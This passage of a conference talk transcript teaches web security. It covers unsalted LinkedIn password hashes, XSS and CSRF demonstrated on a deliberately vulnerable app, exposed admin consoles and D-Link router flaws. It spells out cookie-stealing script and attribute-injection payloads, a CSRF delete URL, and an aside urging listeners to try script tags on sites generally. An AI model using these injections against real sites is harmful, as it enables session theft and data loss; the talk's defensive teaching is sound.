zeros, are a marker which the person who created this file has used to indicate which ones they were able to crack. So if it has 5 zeros, they cracked this hash. They found the original password. If it doesn't have the 5 zeros, that's a hash that's yet to be cracked. As you can see, most have zeros. There are quite a few that don't, but most have zeros. I haven't actually tried to see which percentage of them have zeros, but I think they like 70% were cracked in the first few hours. So most LinkedIn users use pretty bad passwords. And just to show you how bad, I have a Python script running here, which generates the SHA-1, which is what this file happened to be using, for a couple of weak passwords. First, let's try password. Like, who in their right mind is going to use password as their password? Maybe, the website says pick a password. Password. Okay. So let me take that thing and just I wanna. Oh, what happened here? Sorry. Hashlib. SHA-1. I just wanna prepend 5 zeros. And yeah, so that's the thing that I really should be looking for, because it's very likely that this hash has been cracked. So just going back here, let me grab this and this file. Yeah, it's there. So someone has very likely used password as their password. Anything else you'd like to try? Come on, this is your chance. LinkedIn. LinkedIn? Yeah, okay. So that's the hash. Let's grab that. Yep, someone has used LinkedIn. I mean, makes sense. The LinkedIn password is LinkedIn. Makes it easy to remember. Okay, so we can keep trying anyway. As you see, many users are not that good at picking very strong passwords, and LinkedIn, in this particular leak, have actually used plain SHA-1 with no salt, because you've seen I didn't have to append, prepend, whatever to the password. I've just taken the password and hashed it and looked it up in the file. Today, LinkedIn claimed that they have obviously closed this window of vulnerability. They use salts, and in fact, they even claimed that it was an old password database, which they used before they introduced salts. And so it might not have helped the users who were, the older users, but new users are totally secure. I mean, the newer passwords are surely stored in a safer fashion. Anyway, let's not attack LinkedIn specifically because it's a very common problem. I mean, the cost of fixing something like this after the fact could be pretty expensive. Another thing that's worth mentioning is that there is no consensus over which hash function to use, because obviously there's a bunch of one-way functions. SHA-1, MD4, MD5, SHA-256 is just a few examples. And there's actually two different views. The one perspective is that you need the hash function to be fast, because you have users trying to log into the system all the time. You maybe have thousands of concurrent login requests. So you can't spend considerable resources on calculating the hash every time a user tries to log in. If you do, you end up being subject to a denial of service. If you have sufficiently many users trying to log in, all your CPU resources are then dedicated to calculating hashes, which is not ideal. On the other hand, the faster your hash function, the faster it is for an attacker to try to brute force it. And today, you can rent a cloud of machines with hundreds of CPUs and hundreds of GPUs as well. I'm not sure if you've seen any general purpose code running on graphical cards today, but you can certainly write a very simple application or use an existing one that tries to brute force passwords, calculate password hashes using the GPU. And I mean, even my MacBook's GPU has like 200 cores. And you can rent clouds of GPUs like that, and of course higher-end GPUs as well. Amazon, for instance, actually has this compute cloud option where you rent servers with a lot of GPUs. The CPUs are pretty weak, but the GPUs are top of the line. So if you use a fast hash function, you make it easier for an attacker to just go over a bunch of options. With a cloud like that, you can possibly find the hashes of all 16-character passwords in a pretty reasonable amount of time. On the other hand, if you use a slow hash function, then like I said, you're subject to denial of service. So it's kind of hard to decide what to do. Most web security experts today recommend Bcrypt or similar algorithms which are actually slow. They're very slow, and they're purposefully slow. It's not like it's a bad algorithm, so it's slow. It's slow because it was designed to be slow so that you can't possibly brute force every possible password combination in a reasonable amount of time. And by slow, I mean, in some cases, dozens of milliseconds to find the hash. And there is no way around it. I mean, the algorithm is designed like so. So again, there's no consensus here. Yes? Second factor is yet another good idea. By second factor, you mean that in addition to requiring the password, I also require something that the user has, like maybe a PIN number that they have.
SMS or Google Authentication.
Yeah, a PIN number sent over SMS, a mobile application that shows a one-time password. Approaches similar to this. In fact, there are some companies that offer two-factor authentication as a service, so to speak. So basically, you delegate the whole business of managing the second factors to them. They will send SMS messages to your users. They will give you the mobile application to install. Yeah, and also Google, for instance, and Twitter have a similar approach. You could configure your Google account to be protected by a second factor, which is an application running on your phone. And every time you sign in, you have to open the app and copy a couple of digits into your browser. Twitter have a slightly different approach where you try to log in, and then they tell you, OK, now open the mobile application and click I approve this login request. which also makes sense, and it's easier, you don't have to type any digits. So yes, second factor is a pretty good comment, yeah. Okay, so that was password storage, and I've shown you that there is an online property. There's hundreds of them that offer free hash cracking services, and we've also seen that the passwords chosen by LinkedIn users are pretty bad, so hashing, salting, rejecting bad passwords are pretty mandatory.
How do you balance between doing multiple multiple requirements that you ask the user to enter for authentication against you want to easily get them to log in immediately?
Yeah, so the question is where do you put the line between making it easy for the user to log in and protecting yourself and the user from all kinds of attacks? I think that something like asking the user to open a mobile application and click I approve this request, at least for me, it does not cross the line of usability. If I had to do it like 5 times a day, or maybe 50 times a day, it might get a bit over the annoyance line. It depends on the level of security that you need. I mean, you can get pretty good password security without second factor authentication, but it does add something. For example, the school I went to, they required a one-time password whenever you logged in from the outside, but they did not when you logged in from the internal university network. So that's another kind of hybrid approach. Okay, we have a couple of more things to go through, so I'm going to pick up the pace a little. The first is XSS, cross-site scripting. So the general idea of cross-site scripting is injecting JavaScript script into pages that are then shown to other users, or maybe to just one particular user. And the script can do a bunch of interesting things. It could steal the user's cookies, at least the ones that are not marked HTTP only, and send them off to another web property. It could try to manipulate the document, like maybe redirect the login form to evil.com or something of that sort. It could trick the user into liking things on Facebook, or retweeting things on Twitter. There's a bunch of attacks of this shape where you'd have a couple of frames in different Z order, and so the user thinks they're clicking a play button to play a video. I'll leave it to your imagination what kind of video, and then underneath that play button, there's a like button which ends up being clicked, and so you're liking something on Facebook. There's a variety of attack vectors like this. And we're gonna look at 2 different kinds of XSS. One is called temporary XSS, which is usually something that only one user, only at a particular moment in time, will see. So suppose we have a search engine called bad.com. It was initially bad Google, but it didn't fit on the slide. So bad.com. And when you search for something on bad.com, the actual query is passed as a query string parameter. So for instance, if I search for script alert 1, then that's going to be part of the URL. That probably makes sense, to pass the query as part of the query string. That's what Google does. That's what Bing does. However, it's also pretty common for the resulting web page that shows the search results to echo the query. So if you search for script alert 1, this very text might end up being part of the page that's shown to the user with the search results. And our vulnerable application has a problem exactly like that. So if I change this URL here to blah, it says invalid request, blah, which makes sense. I mean, the user should probably know that this was an invalid request and that was the request. However, we just put script alert document cookie in here, then it's going to show me the cookie. And the cookie now happens to be empty because I'm not signed in, but it could be not empty as well. So it says, yes, invalid request slash, but if you look at the page source, here's invalid request, and then my script tags. And the browser just happens to be executing whatever is returned by the server. So that's a temporary XSS. And one way of using it as an attack is to lure the user into clicking a link. So you send a link over email maybe, you maybe post it on Twitter, on Facebook, whatever, and that link already has that script component which then manipulates the target page. Again, that applies usually to just one particular user's session. Another idea is called persistent XSS. That's another perspective. And with persistent XSS, you somehow end up manipulating server state, like maybe a database, so that the server will permanently display a bunch of script provided by the attacker whenever a particular user or even every user will visit a certain page. In our application, this seems like a very likely attack vector because after all, it's designed to share snippets of text. So let me log in as Dave. Never for this site. Thank you. And let's try to create a new snippet. And let's try to put an alert in that snippet. This is going to be served to every visitor. Submit. And now let's go home. Here's Dave's snippet. And as you can see, the server is not really that stupid. It rejected this rudimentary attempt, and it's not really running this script. If we look at the source, the page source, document cookie, you'll notice that the opening script tag was replaced by the opening blocked tag. Now, this is no longer valid HTML, but I mean, pretty much everything is valid HTML, if you think about it. So the browser is happy to display that. It does bring up a couple of concerns, like this looks suspiciously like a blacklist. I mean, what if I use script and put a space on either side of the tag? Is it going to block that or not? What if instead of using this opening bracket, I use some other character that happens to be encoded to the same thing? So we're not going to experiment with these options, even though they're interesting. Let's try something else. Let's put a link here. Click me. OK, so this, when clicked, will run a script, unless, again, the server has something to say about it. Here's the snippet. And if I click the snippet, sure enough, the cookie shows up. The alert shows up. Now, if this wasn't bad enough, I can create an even more malicious snippet. Maybe the href would be just nothing, but I could say on mouse over, hover over me, /a. And now if I just hover over the snippet, it's going to pop up an alert. That's pretty bad, right? So blacklisting and partial measures of protecting against XSS are usually also doomed. Now, that was one example. Another example, which is even more malicious, is around the user's profile. This is the user's profile. And there's the option here of setting the profile color. So if I set this to green, and click update, you see Dave's name is green. And if I set this to red and update, then Dave is now shown in red. What could we possibly do about it? Now, we have to inspect the source again and see how exactly that string, that color string, is being used. If the server only accepts a limited set of colors, color names, and only renders them, we'll be safe. But if the server somehow ends up putting that into the style sheet or directly into the HTML, then we have another attack vector through the user's profile. And we, in fact, have a vector like that. I could have the color here be red, on mouse over, JavaScript alert 1. I believe it should be like that. And now, on mouse over, sure enough, we get a dialog. So basically, if we look at the source, what happened here is that the server is just blindly taking the value and putting it in an HTML attribute, style color red. And then we use the same injection principle by just closing this tag and then injecting our own script, and then the final closing tag came again from the original template. Now, there's a bunch of sanitization frameworks And you have to use a different one for each kind of data. Like for HTML, you should use sanitization for HTML because you do want to allow things like links, bold, underline, text, maybe even headers, but you don't want to allow scripts. In user profile colors, you need a different kind of sanitization because you really only want to allow colors. And there's a bunch of ways to specify colors, like red, green, blue as words, an RGB hex string, and you have to only pass these things through and not allow someone to manipulate your HTML like that. So it's not a very easy thing to tackle, but again, there are frameworks which address, sorry, I don't have a slide on the do's and don'ts, but there are frameworks which address XSS. ASP.NET, for example, does anti-XSS sanitization automatically on certain kinds of inputs. Browsers often have today the capability of detecting some reflected text in the resulting web page and blocking scripts, but there's still lots of websites and lots of browsers that provide enough opportunity to look out for XSS pretty much everywhere you go. And so you can try putting stuff in the URL and see if the server just reflects that back to the user. Whenever you're asked to provide feedback, comments, contact information, try putting some script tags in there and see if anything interesting happens. And it's a pretty big problem. Again, one of the more common vulnerabilities in web applications today. And the damage could be pretty bad. I mean, by changing the document, you could redirect the user to some evil website, or by stealing the cookies, you could assume the user's identity, at least for a short amount of time. Now, a twin problem, to a certain degree, is CSRF, cross-site request forgery. Often people talk about XSS and CSRF in one breath. So CSRF uses the fact that the user is already able of performing operations on a certain website, already authenticated to perform operations on a certain website, and performing these operations without explicit user interaction. Like, for example, suppose you have this forum.com bulletin board, and there's a PHP page over there called delete profile, which takes an additional query parameter confirmed equals true or false. So if it's confirmed equals true, it's going to delete the user's profile right away. Now, if I embed that as the source of an image tag, I can place that image tag anywhere on the internet or even in an email message, and if the user happens to retrieve that image, it's going to end up posting a GET request to this URL. And so if they are logged into forum.com, they're going to end up deleting their own profile. Now, deleting your profile is just one thing, but transferring money to another account is a pretty bad thing. And so this is why your bank often prompts you again and again for your credentials and to authorize the operation explicitly with an OK button when you perform some sensitive operation like that, so that you couldn't possibly have an external URL performing a destructive operation like that. Now, there's an interesting variation of this, which is kind of unexpected. There was an attack, which was really weird, that used CSRF to log in the user into a specific YouTube account. So there is a link that you could craft in the past. Today, YouTube blocks this, which if you visit that link, it will log you into a specific account. Now, the attacker controlled that account. The attacker created that account. And what happened is whenever users visited that link in one way or another, they would log in to that attacker's account. So far, not very interesting. I mean, what could you possibly do from someone else's account, right? However, the target here was the user's search history. They wanted the search history of whatever that user did on YouTube and other Google properties because it's a shared account. So if everyone is logged in as the attacker, then the search history is also being stored into that attacker's profile. And what you do with the search information, well, you can sell search history to advertisers and other kinds of trackers, or you could extort users based on their search history. Like, imagine receiving an email saying, I know what you searched for yesterday in your hotel room in London, and I'm going to email your wife about it, like tomorrow. It's a pretty common extortion scam, and I mean, people fall for that, and people sometimes pay just to remove themselves from some database of search results. Anyway, that's CSRF, and our vulnerable web application is actually also vulnerable to CSRF. So let's see what that looks like. On the profile page, yeah. I'm now attacking myself. So let's change this color to red and update so we don't get that again. On the profile page, there is an icon field. And this takes a web URL to the icon location. That's going to be shown next to my user profile. And this is going to be pulled by the server, by the client, sorry, by the browser, whenever I view a profile or a snippet by that particular user. And so I don't really remember this URL by heart. So let me just copy this thing. So we need this with delete snippet for our example. Okay, so I'm going to set the icon. I'm going to set the icon for that user to be blah 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 delete snippet at index 0. So whenever someone views that user's profile, their first snippet in my application is going to be deleted. A really nasty side effect. So if I just click update here, you'll notice there's a broken image right here. And so I'm currently logged in as Dave. And so I'm pretty much attacking myself. Dave is attacking himself. And there's a snippet over here provided by Dave. However, that snippet was already deleted. So if I refresh, you see I now only have the original snippet. And if I go back here again, I have no snippets anymore. So every time I go back to that home page, I end up deleting my most recent snippet. And again, I mean, deleting a snippet is not the nastiest thing an attacker can do if they have access to your account like that. Now, if you think that by blacklisting or by performing some kind of regex manipulation over your inputs, you can get rid of all kinds of XSS and CSRF, consider the 70 different ways to encode this character in HTML. Yes, there's literally 70 different ways. And I mean, I'm not sure you could easily blacklist all of those. And that's just the opening bracket, which opens the script tag or something malicious like that. Consider the same 70 ways to encode an apostrophe, a backtick, and a bunch of other dangerous characters, so to speak. So blacklists and trying to sanitize the input after the fact are probably doomed. So a couple of good ideas anyway. Like I said, do not trust user input. We've seen this already with injections, and this applies as well for XSS. Do not allow GET requests to modify state. This applies to CSRF. Because the two examples we've seen are just a URL that the browser hits with a GET request. If that GET request is allowed to modify internal state, like delete a snippet or transfer money to a bank account or delete a user's profile, then you have it pretty bad. But you can require post requests for destructive actions, like to delete a snippet or to delete a user profile or to transfer money to a bank account. You would force a form submission, which will issue a post request. It's much harder to fake a post request. It's much harder to trick the user into issuing a post request. However, even that can be manipulated, because if you combine XSS and CSRF, then you could use XSS to inject JavaScript, which will create a form and submit a post request. But again, it's harder than just letting the user click a link and have their account deleted as a result. So forcing gets to perform no destructive actions and asking for confirmation is a good idea. Escaping and sanitization of user input is also always a good idea. Another anti-CSRF approach is called anti-CSRF tokens. This is something that most web frameworks today provide out of the box and even sometimes turn on by default. And the idea here is that you have a query string parameter, or maybe some part of your cookie. No, not the cookie. A query string parameter that has a value the server regenerates whenever you log in, or at least occasionally. And so it's harder to guess the URL. The URL would not just be delete profile confirmed true, but it would require another additional special value that the server generates occasionally. And so it would be harder for the attacker to guess what that exact value has to be. And when sending, when issuing phishing attacks, sending massive emails, massive tweets, Facebook posts, and so on with the malicious link, that link would only work for a short period of time or only a small subset of users who have that specific anti-CSRF token. So this is another thing that most frameworks today just have out of the box. You just have to use them. Okay, so the last and final thing we're going to see today, and that's exactly what I have time for, is admin consoles. And this has to do with security misconfiguration, which we've seen in the OWASP top 10. And security misconfiguration, admin consoles basically means that there is some way to access your server through a backdoor, through a console built for administrators, for debugging purposes, for development purposes, which happened to be left open. And many web servers today have this kind of admin console capability. Many web frameworks today have admin consoles, and it's pretty dangerous. So for example, this is, well, I don't have internet connectivity, so it's good I have the screenshot here. This is a very super detailed error message from an admin console that's publicly accessible online. The URL is not here to protect the innocent, but basically this page is accessible through search engines. So you don't even have to look for that specific vulnerable server. You just search the web for specific strings, and you find a bunch of admin consoles like that. This one in particular provides exception details. It doesn't let you manipulate the server actively. It just gives you error details for the last couple of exceptions this web server has experienced. So one we see here is org apache FOP apps FOP exception with the exception details. Not that bad. I mean, okay, so there was an exception on that server. But first, notice it discloses file system information, which is borderline risky, but it also exposes cookies. For instance, the all raw, where is it? Yeah, the all raw value here, variable here, has the server headers, like connection keep alive, accept text HTML, and then it has cookies. Commerce anonymous shopper equals something, ASPX authentication, this is the ASP.NET session cookie, equals something. And so if you find these kind of pages quickly enough, you can impersonate users. You can steal that cookie and just try and use it. And this is one example of admin console. That's all I have time for today. But you can easily find online exception messages, cookie contents, and in some cases, even an open active backdoor when you only need a specific password or you only need to forge an incoming IP address to get admin rights on that particular server. And again, this is super risky, so I'm not going to try and demonstrate that today, but that's another common vulnerability. Now, there is this one example I promised you, which combines pretty much all of the vulnerabilities we discussed in one single report, and that's this D-Link router. There's actually a couple of models, the DIR615 and the DIR300. These two router models had pretty much every possible web application vulnerability. They had OS command injection through ping, so they also had this kind of ping console where you could put in an IP address, but you could also manipulate it into running something using backticks. They had CSRF to change the admin password. So if you were logged into the router and you happened to click a link that looks like this, it would change your admin username and password, and it would open up your router for remote administration from the internet. That's again just a simple get URL, so you could post that as your profile picture on Facebook, and maybe that would work. They had server information disclosure through a simple link like this, devinfo.txt. When you hit that link, it would tell you everything about the router, which operating system it's running, which firmware version, which IP addresses it is configured on, in an unauthenticated fashion. You don't have to be logged on to the router to see any of this, just a plain URL like that. This was obviously left there for debugging diagnostic purposes, but someone forgot to remove or secure that thing. And finally, they store passwords insecurely. If you look at the password file on the router, you'll see plain text usernames and plain text passwords. Now, they fixed most of these things already, which is why I'm mentioning this, but in firmware, in web servers that run on this kind of embedded devices, it's that much harder to correct this kind of errors after the fact. So in web applications running ASP.NET, you can often patch this kind of thing in a day or two, but create and release new firmware versions for routers, that's going to be pretty challenging. And it took D-Link a few months to get through that, during which period a bunch of D-Link routers were vulnerable to all of these attacks. So in closing, as I said, if you're working on web applications today as architects or developers, you should be aware of these most common web application vulnerabilities. You should look out for them and not rely on some external company that will find through pen testing and fix these problems for you. Your developers should get security training. There's online training that's pretty good on Pluralsight, for example. There's offline training, there's books. Every application framework today has some documentation on how to secure it, and you should have people read that. And when you review their code, you shouldn't only look at quality, you shouldn't only look at elegance, you should look at security as well. You should actively seek and try to correct these kind of security vulnerabilities. And finally, even if you fix all the web application vulnerabilities in your app, there are other ways to attack your system. Through people, through social engineering, through network attacks, through hardware attacks, through malware. So security is really a holistic thing that requires a holistic approach. So I'm not going to hold you from going to lunch any longer. If you have any questions, please come up and ask. And thank you very much for coming today. Enjoy the conference. Thank you.